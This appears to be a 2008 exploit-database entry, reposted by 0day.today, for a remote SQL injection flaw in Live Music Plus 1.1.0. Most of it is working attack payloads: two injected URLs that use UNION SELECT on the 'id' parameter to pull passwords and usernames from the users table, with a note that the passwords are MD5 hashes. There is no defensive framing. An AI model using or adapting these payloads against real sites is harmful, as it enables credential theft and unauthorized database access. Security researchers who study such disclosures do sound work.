id: 3445
date: 07/23/2008
title: Live Music Plus 1.1.0 (id) Remote SQL Injection Vulnerability
author: IRAQI
cves: 

=============================================================
Live Music Plus 1.1.0 (id) Remote SQL Injection Vulnerability
=============================================================



###############################################################
#################### i love abeer ####################
##
## Remote SQL injection Vulnerability
##
## Live Music Plus v1.1.0
##                            
###############################################################
###############################################################
##
## AuTh0r : IRAQI
##
##
########################
########################
##
## -[[: Exploite :]]-
##
## http://www.xxx.com/index.php?act=Singer&id=-1%20union%20select%200,concat(password,0x3a,username),2,3,4,5+from+users/*
##
## index.php?act=Singer&id=-1 UNION SELECT 1,password,3,4,5,6 FROM a5421577_db2.users--
##
########################
########################
 
1) Download script :  http://www.nersoft.com/
2) Passwords Md5
 
#############################################################################




#  0day.today [2023-03-22]  #